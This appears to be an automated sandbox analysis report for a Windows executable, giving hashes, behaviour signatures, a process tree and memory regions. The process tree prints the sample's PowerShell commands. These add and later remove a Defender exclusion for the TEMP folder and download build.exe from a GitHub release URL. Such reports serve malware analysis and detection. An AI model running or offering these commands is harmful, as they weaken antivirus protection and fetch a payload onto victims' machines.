Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22/03/2025, 05:53

General

  • Target

    ZGZ3X_nig.exe

  • Size

    57KB

  • MD5

    16edd47bf01716b24958a0b3a3a7bcfb

  • SHA1

    8b7972f4190c2ca9d600084611e966fa0f899b98

  • SHA256

    568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8

  • SHA512

    9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1

  • SSDEEP

    768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe
    "C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2680
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\AE9.tmp\AEA.tmp\AEB.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2760
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2796
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:2888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2880
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2584
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
          3⤵
          • Hide Artifacts: Ignore Process Interrupts
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2960

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\AE9.tmp\AEA.tmp\AEB.bat

      Filesize

      2KB

      MD5

      1c935ef28fdfd394b770d945d7f04d76

      SHA1

      29e251c3c40ce4ad1b2984bf26b444aa045d9b21

      SHA256

      aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681

      SHA512

      a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      9e6c51a3f6886d64fc6dfcfc4f376fb4

      SHA1

      da9e5844939fd2b6d823870bb483ecf63855b440

      SHA256

      7a8239e7feee11f3922e57d89df79f9085aea7a1b29aca255eaab35880badb24

      SHA512

      e5f3b4f5ddb515fd5d69f93c21313c18dc0cbe93785b2385f370c2fa8f77acd7c27c67880d25f884037654af8e3fe11b983139d18632b56ece1fd1c5ed223b79

    • memory/2584-22-0x0000000001E10000-0x0000000001E18000-memory.dmp

      Filesize

      32KB

    • memory/2584-21-0x000000001B740000-0x000000001BA22000-memory.dmp

      Filesize

      2.9MB

    • memory/2680-28-0x0000000140000000-0x0000000140028000-memory.dmp

      Filesize

      160KB

    • memory/2680-0-0x0000000140000000-0x0000000140028000-memory.dmp

      Filesize

      160KB

    • memory/2880-11-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

      Filesize

      9.6MB

    • memory/2880-13-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

      Filesize

      9.6MB

    • memory/2880-14-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

      Filesize

      9.6MB

    • memory/2880-12-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

      Filesize

      9.6MB

    • memory/2880-10-0x000007FEF43D0000-0x000007FEF4D6D000-memory.dmp

      Filesize

      9.6MB

    • memory/2880-9-0x0000000002910000-0x0000000002918000-memory.dmp

      Filesize

      32KB

    • memory/2880-8-0x000000001B780000-0x000000001BA62000-memory.dmp

      Filesize

      2.9MB

    • memory/2880-7-0x000007FEF468E000-0x000007FEF468F000-memory.dmp

      Filesize

      4KB